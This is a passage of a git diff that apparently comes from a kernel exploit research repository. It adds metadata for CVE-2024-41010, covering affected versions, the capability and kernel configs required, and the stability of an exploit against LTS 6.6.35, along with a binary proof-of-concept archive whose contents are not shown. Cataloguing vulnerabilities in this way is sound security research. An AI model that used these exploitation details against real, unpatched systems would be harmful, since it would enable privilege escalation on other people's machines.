"patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1cb6f0bae50441f4b4b32a28315853b279c7404e", + "cve":"CVE-2024-41010", + "affected_versions":[ + "6.6 - 6.10" + ], + "requirements":{ + "attack_surface":[ + + ], + "capabilities":[ + "CAP_NET_ADMIN" + ], + "kernel_config":[ + "CONFIG_NET_SCHED", + "CONFIG_NET_SCH_INGRESS" + ] + } + }, + "exploits": { + "lts-6.6.35": { + "uses":[ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes":"99%" + } + } + } \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-41010_lts/original.tar.gz new file mode 100644 index 00000000..598bde45 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-41010_lts/original.tar.gz differ